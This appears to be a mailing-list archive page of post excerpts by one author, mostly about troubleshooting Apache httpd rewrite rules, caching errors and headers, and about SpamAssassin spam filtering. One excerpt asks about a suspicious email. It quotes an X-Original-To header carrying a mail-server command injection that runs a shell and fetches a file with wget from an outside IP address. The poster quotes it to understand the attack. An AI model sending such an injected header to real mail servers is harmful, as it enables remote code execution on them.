Re: [users@httpd] Stripping query string except from specific URL

RewriteCond %{REQUEST_URI} !/resources/blog RewriteCond %{QUERY_STRING} ^start=\d+$ RewriteRule (.*)   /$1?    [L,R=301,QSD] [Sun Apr 28 15:40:02.614893 2024] ... rewrite 'resources/blog' -> 'index.php' [Sun Apr 28 15:40:02.614921 2024] ... internal redirect with

Re: [users@httpd] Stripping query string except from specific URL

Hi, I'm really quite stuck and hoped you could help. My apologies - the output was from wget, as that's what I typically use. $ curl 'https://guardiandigital.com/resources/blog?start=48' 301 Moved Permanently Moved Permanently The document has moved

Re: [users@httpd] Stripping query string except from specific URL

13 62.111.193.42 - - [24/Apr/2024:15:19:36 -0400] "GET /index.php HTTP/1.1" 200 33921 r:"-" "Wget/1.21.4" X:"SAMEORIGIN" 0/129431 573/35481/33921 H:HTTP/1.1 U:/index.php gd443 s:200 It did exactly what you asked, yes. Further, I asked you to use curl to see if you get redirected

Re: [users@httpd] Stripping query string except from specific URL

Hi, We have a situation where we need to strip a query string from all URLs except ones matching a particular pattern. However, when I try the rules below, it redirects to the homepage for some reason. In this example, I'd like to strip off the query

Re: [users@httpd] Stripping query string except from specific URL

Hi, We have a situation where we need to strip a query string from all URLs except ones matching a particular pattern. However, when I try the rules below, it redirects to the homepage for some reason. In this example, I'd like to strip off the query string from all URLs

[users@httpd] Stripping query string except from specific URL

Hi, We have a situation where we need to strip a query string from all URLs except ones matching a particular pattern. However, when I try the rules below, it redirects to the homepage for some reason. In this example, I'd like to strip off the query string from all URLs except those

Re: [users@httpd] RewriteMap and patterns

in the map to be really quick, then let the redirection.php script process the remaining legacy 70,000 or so... -- Profile Photo Dave Wreski Chief Executive Officer Guardian Digital Logo <https://www.guardiandigital.com> *We Make Email Safe For Business* Guard

Re: [users@httpd] RewriteMap and patterns

Hi, First make the proper redirections:   RewriteEngine on   RewriteMap lsv2ids "txt:/etc/httpd/conf.d/linuxsecurity-lsv2ids.map"   RewriteRule "/content/view/(.*)" "${lsv2ids:$1}" [R,L] Define the fallback for requests not ending in PHP but for which I hand the php handler to deal them.  

Re: [users@httpd] RewriteMap and patterns

Hi, What I would do is RewriteRule with just [L] tag for internal redirection or [R,L] if you don't mind the redirection to be external. Since I haven't seen the whole configuration my guess is you don't have the proper handler defined for the resulting url and that's why you get a 404, and

Re: [users@httpd] RewriteMap and patterns

On 3/11/24 4:42 PM, apmail-dferra...@apache.org wrote: On 09/03/2024 22:59, Dave Wreski wrote: Hi Eric, Might have to prefix with %{DOCUMENT_ROOT} I've tried variations of that, including the following, but no luck. They all fail with 400 or "invalid request" RewriteRule &quo

Re: [users@httpd] RewriteMap and patterns

Hi Eric, Might have to prefix with %{DOCUMENT_ROOT} I've tried variations of that, including the following, but no luck. They all fail with 400 or "invalid request" RewriteRule "/content/view/(.*)" "${lsv2ids:$1}" RewriteRule "/content/view/(.*)" "%{DOCUMENT_ROOT}${lsv2ids:$1}" [PT]

Re: [users@httpd] RewriteMap and patterns

Hi, I think the issue is that mod_proxy uses r->filename (i.e. what non-PT rewrites put the substitution) to setup the proxy sub-modules when using SetHandler to configure proxying. I'm not sure I understand what that means - do you have a recommendation for how I should configure this

Re: [users@httpd] RewriteMap and patterns

Hi, What you have looks reasonable, PT should be URL-to-URL. You might try logging %f in your logformat. I've added %f and it just shows some of what looks like components from the 404 page, not the redirected page. What kind of handler is meant to handle these requests and how is it

[users@httpd] RewriteMap and patterns

Hi, I'm trying to use RewriteMap on a few thousand older articles to map them to their modern equivalent. The pattern matches, but then the redirect doesn't occur. The examples and apache docs say I should be using [PT] to pass-through, but it results in a 404: [Thu Mar 07 09:56:47.696040

Re: [users@httpd] Limiting redirects with rewriterule/rewritecond

In my ongoing effort to reduce the number of redirects for linuxsecurity.com , I could use a bit more help. Currently we have one redirect to strip off any potential trailing slash as well as another that strips out any preceding 'www'.

[users@httpd] Limiting redirects with rewriterule/rewritecond

Hi, In my ongoing effort to reduce the number of redirects for linuxsecurity.com, I could use a bit more help. Currently we have one redirect to strip off any potential trailing slash as well as another that strips out any preceding 'www'. RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]

[users@httpd] Reducing redirects

Hi, I think I have what is a pretty involved request for assistance. We have a website with content that is decades old and has tens of thousands of pages of content of the form /content/view/1234, where 1234 is the Joomla article ID. Joomla has since started using search-engine friendly

Re: [users@httpd] Removing trailing slashes with query strings

Hi, [Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 ] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/initial

Re: [users@httpd] Removing trailing slashes with query strings

Hi, [Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 ] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/initial

Re: [users@httpd] Removing trailing slashes with query strings

Hi, On 1/16/24 3:03 PM, Dave Wreski wrote: [Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 <http://68.111.193.42:0>] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/i

Re: [users@httpd] Removing trailing slashes with query strings

[Tue Jan 16 08:55:13.289205 2024] [rewrite:trace1] [pid 904886:tid 904938] mod_rewrite.c(493): [client 68.111.193.42:0 ] 68.195.193.42 - - [webstage.example.com/sid#560ba7f01a68][rid#7f2b1c0bc210/initial

Re: [users@httpd] Removing trailing slashes with query strings

Hi, I have the following rule that works well to remove trailing slashes from URLs: RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)/$ $1 [R=301,L] This is done to prevent the non-slash URL from being treated as duplicate content with the URL with a slash.

[users@httpd] Removing trailing slashes with query strings

Hi, I have the following rule that works well to remove trailing slashes from URLs: RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)/$ $1 [R=301,L] This is done to prevent the non-slash URL from being treated as duplicate content with the URL with a slash. The problem is that there

Re: [users@httpd] Rewrite query string?

https://example.com/search?searchword=CVE-2021-4014= I've tried the following RewriteCond/RewriteRule in various forms, but not sure what I'm doing wrong. RewriteCond %{QUERY_STRING} ^searchword=(.*) RewriteRule ^ q=$1 [NC,L] Ideas for what I'm doing wrong would be greatly appreciated. I

[users@httpd] Rewrite query string?

Hi, I'm trying to replace "searchword" with just "search" in the following URL: https://example.com/search?searchword=CVE-2021-4014= I've tried the following RewriteCond/RewriteRule in various forms, but not sure what I'm doing wrong. RewriteCond %{QUERY_STRING} ^searchword=(.*) RewriteRule

Re: [users@httpd] Removing trailing slashes?

Hi, I would stop using .htaccess files, first, and merge all rewrite rules in the relevant vhost / Directory block. Then, I would use the rewrite log to see what is really happening. Using multiple .htaccess files is a recipe to lose all your hair. These are Included in the directory

Re: [users@httpd] Removing trailing slashes?

Hi, I have a FAQ, but need some additional info I haven't been able to find. I'm trying to process links Google has indicated are 404s that never really ever existed on our site. I have an htaccess file I'm Including with my main apache config that only contains

[users@httpd] Removing trailing slashes?

Hi, I have a FAQ, but need some additional info I haven't been able to find. I'm trying to process links Google has indicated are 404s that never really ever existed on our site. I have an htaccess file I'm Including with my main apache config that only contains RewriteConds. This file is

[users@httpd] Tracing redirects

Hi, I have a link on our site that is caught in a redirect loop that I can't figure out. We have a few thousand redirects, making it very difficult to track down. I've tried enabling logging: LogLevel info rewrite:trace2 but even with just trace2, there are thousands of log lines

[users@httpd] RewriteRule and priorities

Hi, I have a rewriterule like: RewriteRule ^/blog/(.*) /resources/blog/$1 [L,R=301] but I also have several instances where there are exceptions. In other words, I have an article at /blog/ that I want to be redirected to some place other than /resources/blog. How can I do this? Order of

Re: [users@httpd] SetEnvIf and exceptions

Hi, On 4/11/23 8:59 PM, Tatsuki Makino wrote: Dave Wreski wrote on 2023/04/12 01:39: In case I wasn't clear, simply removing the caret was not enough to make this work. The "Require env SOMENAME2" was enough to begin blocking every page on the site with a 403, not just the

Re: [users@httpd] SetEnvIf and exceptions

Hi, SetEnvIf user-agent "(?i:TurnitinBot)" SOMENAME1 SetEnvIf Request_URI "^linuxsecurity_features\.*$" SOMENAME2 And let it meet all the requirements. Require all granted Require not env SOMENAME1 Require env SOMENAME2 This had the effect of

Re: [users@httpd] SetEnvIf and exceptions

Hi, SetEnvIf user-agent "(?i:TurnitinBot)" SOMENAME1 SetEnvIf Request_URI "^linuxsecurity_features\.*$" SOMENAME2 And let it meet all the requirements. Require all granted Require not env SOMENAME1 Require env SOMENAME2 This had the effect of blocking elements on every page (and

Re: [users@httpd] SetEnvIf and exceptions

Hi, On 4/10/23 11:48 PM, Tatsuki Makino wrote: Dave Wreski wrote on 2023/04/11 10:54: SetEnvIf user-agent "(?i:TurnitinBot)" stayout=1 SetEnvIf Request_URI "^linuxsecurity_features\.*$" !stayout I have done it in the past, too. It was like allowing another level of condi

Re: [users@httpd] SetEnvIf and exceptions

Hi, I don't know what is troubling you... For now, don't use the combination of Order,Allow,Deny and Require* in configuration file that will be created in 202x. :) AllowDeny of ENV should be replaced by the following. Allow from env=X_FOOBAR -> Require env X_FOOBAR It can write more

Re: [users@httpd] SetEnvIf and exceptions

Hi, On 4/10/23 10:51 AM, Eric Covener wrote: .htaccess: negative Require directive has no effect in directive Ah, I guess you'll have to restore the RequireAll and its contents. Yes, I should have mentioned that I've already done that - without it, it was producing a 500 error for

Re: [users@httpd] SetEnvIf and exceptions

Hi, I have an apache-2.4.56 install on fedora37 and trying to block some bots from accessing the site, unless they're trying to access our RSS feeds. How can I do this? I'm blocking the bots with SetEnvIF lines in the .htacess file in the document root like:    

[users@httpd] SetEnvIf and exceptions

Hi, I have an apache-2.4.56 install on fedora37 and trying to block some bots from accessing the site, unless they're trying to access our RSS feeds. How can I do this? I'm blocking the bots with SetEnvIF lines in the .htacess file in the document root like:     SetEnvIf user-agent

Re: Strange findings debugging bayes results

Hi, Here's also another 50+ headers we've collected over the years that I believe started as a list from AXB 10+ years ago. https://pastebin.com/raw/f6Fwh8HJ dave On 2/16/23 6:02 AM, Henrik K wrote: On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote: I was investigating a bunch of

[users@httpd] Cloudflare logging and remote IP

Hi, I'd like to be able to track the original IP making requests, not the cloudflare IP. How can I do that? It appears both mod_remoteip and mod_cloudflare are extremely old, and mod_cloudflare is apparently deprecated altogether. Does it require rebuilding apache with the mod_remoteip

[users@httpd] cache_disk:error and AH00717 errors

Hi, I have an apache-2.4.54 server on fedora37, and seeing errors related to cache_disk, although this problem has been happening through many previous versions as well. [Mon Nov 28 11:29:38.432076 2022] [cache_disk:error] [pid 65726:tid 65836] (2)No such file or directory: [client

[users@httpd] CSP Violation: "blocked-uri": "inline" despite having 'unsafe-inline'

Hi, I've just recently started working with the Content-Security-Policy header for my apache/joomla/fedora35 install on a pretty complex website and having some problems. Here is my current CSP header: "default-src 'self' 'unsafe-inline'; font-src 'self' fonts.googleapis.com

Intuit servers sending paypal phishes

Hi, Intuit's servers are being used to send Paypal phishing invoices combined with the "evil numbers" scam. https://pastebin.com/iad07S8N Received: from o4.e.notification.intuit.com (o4.e.notification.intuit.com [167.89.82.160]) X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

That's a great call, thanks. I grepped my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox /home/thomas.cameron/mail/INBOX/[mailbox file] and

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

You should probably check that none of your ham (i.e. non-spam) messages contains SPAM_99 or SPAM_999. It can happen when spammers poison your bayes database, and increased score in that case might lead to legitimate mail being misclassified as a spam. That's a great call, thanks. I grepped

Re: Seeing "check: exceeded time limit in ..." and need to resolve it

For that matter how many know about 'apropos'? And, even if they do, they may not discover 'locate' because 'apropos search' doesn't find either 'updatedb' or 'locate'. You have to enter 'apropos find' to discover that 'locate' exists, and even then you could get side tracked into trying to

[users@httpd] AH00717: Premature end of cache header

Hi, I'm seeing the following in the error_log with httpd-2.4.48-1.fc33.x86_64 [Mon Sep 20 16:03:43.127577 2021] [cache_disk:error] [pid 2940168:tid 2940247] (70014)End of file found: [client 141.101.76.246:16858] AH00717: Premature end of cache headers. Is this the same as this report

Re: [users@httpd] X-Frame-Options and security

https://httpd.apache.org/docs/2.4/en/mod/mod_headers.html#header What headers are returned by error pages and by redirects (e.g. 302 redirect when requesting a directory without a trailing '/')? What headers are returned by dynamic responses (proxied or CGI), if you have any? It appears to

Re: [users@httpd] X-Frame-Options and security

https://httpd.apache.org/docs/2.4/en/mod/mod_headers.html#header What headers are returned by error pages and by redirects (e.g. 302 redirect when requesting a directory without a trailing '/')? What headers are returned by dynamic responses (proxied or CGI), if you have any? It appears to

Re: [users@httpd] X-Frame-Options and security

e were using both GOFORIT and SAMEORIGIN values. I used lynx to dump the headers and it only displays SAMEORIGIN, as it should. Where else can I look to see where this option is being set? Thanks, Dave On 9/1/21 7:43 PM, Eric Covener wrote: On Wed, Sep 1, 2021 at 7:30 PM Dave Wreski wrot

Re: [users@httpd] mod_status over SSL?

Hi, You have server-status defined within an 80/http virtual host and as such I expect it will only be available via port 80/http. You can define server-status more globally or within an https configuration depending on what you want to support. However, bottom line is server-status and

[users@httpd] mod_status over SSL?

Hi, I have an apache-2.4.48 server on fedora34 and would like to enable mod_status to be able to obtain server status information. However, the docs appear to say the only way to access it is over port 80, not SSL. Is that correct? Chrome is also expecting the site to be over SSL, of

Re: [users@httpd] X-Frame-Options and security

"max-age=63072000; includeSubDomains" Header set Feature-Policy "geolocation 'self'; vibrate 'none'" Header set Content-Security-Policy "frame-ancestors 'self'" Thanks, Dave On 9/1/21 7:43 PM, Eric Covener wrote: On Wed, Sep 1, 2021 at 7:30 PM

[users@httpd] X-Frame-Options and security

Hi, I ran a security scan for X-Frame-Options (https://gf.dev/x-frame-options-test) on our site (https://linuxsecurity.com), and it returned SAMEORIGIN, which is good, but it also returned GOFORIT. The only settings we have are the following:     Header set X-XSS-Protection "1;

Re: More fake order spam

Invalid List-ID. You can then use that with other weirdness in a meta. header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/ meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS score  LIST_ID_IMPROPER_FORMAT 0.001 describe

Re: More fake order spam

Hi, Investigate adding the SEM_FRESH rules - this domain was created less than five days ago. https://spameatingmonkey.com/services OK, how do I get those rules installed? I've only installed KAM rules using a channel. I don't see anything similar for SEM rules. I see the page you linked to

Re: More fake order spam

-2.5 RCVD_IN_HOSTKARMA_W    RBL: Sender listed in HOSTKARMA-WHITE [185.41.28.7 listed in hostkarma.junkemailfilter.com] We've reduced this score to -1 locally. -1.0 BAYES_00   BODY: Bayes spam probability is 0 to 1% Needs to be trained, obviously.

Re: [users@httpd] Random 500 errors

On 4/20/21 12:41 PM, Daniel Ferradal wrote: We can just speculate here to those questions. Rule of thumb if not showing in httpd error log, not httpd error. Thanks so much for your help. Would that include any RewriteRule entries? Of course just speculation, but that would lead me more

Re: [users@httpd] Random 500 errors

still being proxied, even though it's not being cached, and causing these errors? Would it explain why the same page doesn't always produce the error, or why not all pages produce a 500 error? Thanks, Dave El mar, 20 abr 2021 a las 14:49, Dave Wreski () escribió: If the error comes from

Re: [users@httpd] Random 500 errors

pdate HTTP/1.1" 500 12704 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 2/2408334 915/21235/12704 Thanks, Dave El mar., 20 abr. 2021 4:03, Dave Wreski escribió: Hi, I have an apache-2.4.46 system on fedora33 and having wei

[users@httpd] Random 500 errors

Hi, I have an apache-2.4.46 system on fedora33 and having weird 500 errors that I can't explain. 72.70.38.104 - - [19/Apr/2021:21:38:56 -0400] "GET /advisories/debian/debian-dsa-2944-1-gnutls26-security-update HTTP/1.1" 500 12704 "-" "Mozilla/5.0 (compatible; bingbot/2.0;

Re: Spoofed amazon order email

Hi Steve, As Antony just reported, post these spamples to something like pastebin.com then provide a link so we can view the raw email. X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on This is the first issue I see - you're likely missing a lot of additional features of later

[users@httpd] apache error 500 weirdness

Hi, I have an apache-2.4.46 system with php-7.4.16 on fedora33 site using cloudflare, although I'm not sure if it's related. This is an entry from our logs from a cloudflare IP: 172.68.34.214 - - [11/Apr/2021:21:22:11 -0400] "GET

Re: ANN: ReturnPath rule renaming

Hi,   RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED   RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE   RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL Please audit your local config for score overrides and meta rules depending on the old names. I don't see that the VALIDITY rules exist yet. Will

[users@httpd] AH00717: Premature end of cache headers

Hi, I have an apache 2.4.46 system on fedora33 with php-7.4.16 and seeing the following errors pretty regularly on my joomla system: [Fri Mar 26 19:20:38.768857 2021] [cache_disk:error] [pid 2202202:tid 2202272] (70014)End of file found: [client 172.69.19.132:44102] AH00717: Premature end

Re: apache.org is blacklisted

On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote: On Wed, 27 Jan 2021, Benny Pedersen wrote: http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html i dont know how to handle this :=) On 26.01.21 17:43, John Hardin wrote: Only one lists it:  

Re: Emotet today..

Pedro, do you see sigs for it yet? We're seeing a ton of Doc.Dropper.EmotetRed1220-9816007-0. Have you submitted a sample to Steve at Sanesecurity and clamav? Best, Dave On 1/13/21 10:39 AM, Pedro David Marco wrote: Hi all... sorry for the semi off-topic... Today Emotet is being sent in an

Re: Scoring Based on IP Address

Hi, On 12/17/20 6:05 PM, Matt wrote: Is there a way with spamassassin local.conf to add a higher score based on source ip address or subnet? Basically the last IP in "Received:" header. bad_subnet_add_20_points: 192.168.240.0/24 Raising the score if that IP appeared anywhere in headers or

Re: adding AV scanning to working Postfix/SA system

On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote: On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would

Re: adding AV scanning to working Postfix/SA system

On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would also be interested in newer/supported AV

Re: to: header is not in my domain

Thanks for quick reply, but blacklist what? The problem is I do not know this spammy domains. I want to give a score when To: field is NOT in anyaddr...@mydomain.com If only it were that easy. You'll notice that recipients of this mailing list receive mail to the mailing list address, not to

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

On 7/10/20 8:07 AM, Pedro David Marco wrote: >On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb wrote: >so glad to read this... confirms my picture of you. >now back my pet project: rewrite Tom Sawyer OK... who starts??? :-) once Finished we can rewrite "El Quixote" as well...

Re: [owl-users] First post - OWL looks really nice! - Q1

significance in the open source community, and should have been more clear in the article about its purpose and current role. We've made some changes, and would welcome a review: https://linuxsecurity.com/features/features/7-best-linux-distros-for-security-and-privacy-in-2020 Thanks, Dave Wreski I

Coronavirus domains

Hi all, Malwarepatrol has just released a list of 13,000+ domains related to coronavirus scams: https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip Anyone else have any rules or changes

[users@httpd] cache_disk:error - AH00708: Cannot open data file

Hi all, I have an apache 2.4.41 system on fedora31 and having a disk cache problem: [Fri Jan 17 12:43:07.136283 2020] [cache_disk:error] [pid 188213:tid 14725280512] (2)No such file or directory: [client 40.108.163.149:59878] AH00708: Cannot open data file

SpamAssassin 18th anniversary article

Hi all, LinuxSecurity just posted an article on the history of SpamAssassin and its recent 18th anniversary, some of the new features coming in v4, and speaks with some of the lead developers.

Shell commands in Received and Delivered-To headers

Hi all, Anyone have a guess on what this is trying to accomplish? From r...@sab.com Thu Jul 11 11:05:10 2019 Return-Path: X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com Delivered-To: usern...@example.com Received: by

Re: [Maria-discuss] execute failed: Incorrect string value: '\xD6sterl...' with mariadb and perl DBD

? There are dozens of tables... Thanks, Dave -F On Jun 19, 2019, at 1:56 PM, Dave Wreski wrote: Hi, I'm trying to use perl-DBD to write a buffer of text that contains an email with umlauts and other non-ASCII characters to a joomla database and having a problem. DBD::mysql::st execute failed: Incorrect

[Maria-discuss] execute failed: Incorrect string value: '\xD6sterl...' with mariadb and perl DBD

Hi, I'm trying to use perl-DBD to write a buffer of text that contains an email with umlauts and other non-ASCII characters to a joomla database and having a problem. DBD::mysql::st execute failed: Incorrect string value: '\xD6sterl...' for column

[users@httpd] mod_cache_disk: AH00708: Cannot open data file

Hi all, I have a apache-2.4.34 system on fedora28 and have set up disk caching using "CacheQuickHandler off" to go through apache before being fetched from the cache and having some problems. [Mon Apr 01 14:16:48.908257 2019] [cache_disk:error] [pid 5955:tid 140305609242368] (2)No such file

[users@httpd] AH00708: Cannot open data file

Hi, I have a fedora28 system with httpd-2.4.34-3.fc28.x86_64 and having a problem with caching. I believe this started happening after we recently changed the hostname from "webstage" to "www". [Sun Feb 10 10:42:26.731666 2019] [cache_disk:error] [pid 997:tid 140189099861760] (2)No such

[users@httpd] Apache SuexecUserGroup and group permissions

Hi, I'm having trouble with permissions and ownership on a fedora28 system with apache-2.4 and joomla-3.9. I'd like to be able to have only the minimal number of files necessary to be owned by apache and have an ssh/sftp user have access to read and write every file in the document root.

Re: mysql 8 database problem

On 12/8/18 1:58 PM, Csaba Banhalmi wrote: Hi, I upgraded to mysql and since then I can’t use bases db to score my mails. Spam assassin -D says the following: [12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations for operation ' IN ' [12254] dbg: bayes: cannot use bayes on

[users@httpd] Apache disk cache or app-based?

Hi, We're in the process of rebuilding one of our websites using a more modern version of joomla. The developers want to use an app called SpeedCache, which apparently provides browser cache as well as caching of the general site elements. I'm more inclined to use the built-in apache disk

Re: stackexchange.com in URIBL (false positive?)

  5.7 URIBL_BLACK    Contains an URL listed in the URIBL blacklist [URIs: stackexchange.com] I guess that's not supposed to be like that. I can't change anything at it, just for information for somebody in the position to fix that. It is indeed

Re: Just to lighten your day?

Hi, On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote: One slipped through, with this subtle sig line (thought it might brighten someones day . . . ) "Note: Failure to Verify will lead to final termination of your email account. Technical Team Email Administrator All Right Reversed 2018.(c)"

Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

Hi, Excellent... except for one potential problem... this is in their "foxhole_all.cdb" file which they label as "high false positive risk" - which could scare some away! For those who don't score very high on ClamAv and/or who are able to score DIFFERENTLY based on different types of

***UNCHECKED*** Can't locate object method "trim_domain"

Hi, while learning an mbox on a recent 3.4.2 svn: # sa-learn --spam --progress --mbox junk-012618 28% [== ] 5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at

Re: SA-Update not updating DB

On 11/17/2017 11:39 AM, Jari Fredriksson wrote: David Jones kirjoitti 16.11.2017 kello 15.22: REV=1815298 wget http://sa-update.ena.com/${REV}.tar.gz wget http://sa-update.ena.com/${REV}.tar.gz.sha1 wget http://sa-update.ena.com/${REV}.tar.gz.asc sa-update -v --install

Re: SA-Update not updating DB

REV=1815298 wget http://sa-update.ena.com/${REV}.tar.gz wget http://sa-update.ena.com/${REV}.tar.gz.sha1 wget http://sa-update.ena.com/${REV}.tar.gz.asc sa-update -v --install ${REV}.tar.gz (reload/restart whatever is calling SA -- spamd, amavis-new, mimedefang, MailScanner, etc.) I have

Re: Problem with massive log files

Hi, I've posted the spamfilter.sh file to http://pasted.co/7b794ccd I don't see anything in there about verbose logging, but there are two lines in there with a resemblance to your suggestion: logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to SpamAssassin:

Re: Problem with massive log files

og file is up to 165 Gb. You should look at your logging and/or log rotating system to get this under control. I believe that's going to be /etc/logrotate.d/ Regards, Dave Kind regards. Jim. On 04/04/17 22:41, Dave Wreski wrote: Hi, My set up consists of Pos

Re: Problem with massive log files

Hi, My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV, Amavis-new and Dovecot. What is "spamfilter"? Apr 2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info: spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5 What operating system? Regards,

Re: Define new variables in local.cf

Hi, having the regex into a variable would help maintenance. Something like: $BankList = "Bank1|Bank2|Bank3|Bank4" uri BANKURI /$BankList/i score BANKURI0.2 body BANKBODY /$BankList/i score BANKBODY0.1 is there any way to do this? You might try something like

Re: ClamAV.pm Plugin Not Working

clamdscan -c /etc/clamd.d/scan.conf eicar.txt /home/dan/eicar.txt: lstat() failed: Permission denied. ERROR It looks to be related to clamdscan performing a chroot() and the files you're referencing not being available from within that chroot. Try passing the --stream option. -bash-4.3$

Re: SPF and blocking phishing attempts

Hi, On 10/14/2015 06:08 PM, Dianne Skoll wrote: On Wed, 14 Oct 2015 17:51:23 -0400 Alex wrote: I'd like to make sure incoming mail that appears to be "From:" one of our internal users has indeed gone through one of the systems specified in the SPF record, resulting in

Re: Rules needed...

Hi, blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local RBL). I was hoping for something preventative. Eh? I'm afraid I don't get this at all - greylisting and RBL

Re: Rules needed...

On 06/26/2015 12:45 PM, Benny Pedersen wrote: Alex Regan skrev den 2015-06-26 18:33: http://pastebin.com/FzUkEvRp blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local

Re: PerMsgStatus Util warnings

Hi, $self-{main}-{registryboundaries}-uri_to_domain($fubar); This appears to fix DecodeShortURLs.pm --- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400 +++ DecodeShortURLs.pm 2015-05-15 11:39:35.020499066 -0400 @@ -486,7 +486,8 @@

Re: Spamassassin not catching spam (Follow-up)

Hi, RH i don't know the UK laws but in germany it's for sure not allowed RH because it's legally classified identical to a postman says meh i don't RH walk to go upstairs today and throw the letter away RH if you pretend to provide relieable mailservices it should be logically RH that discard

  1   2   3   4   5   6   7   >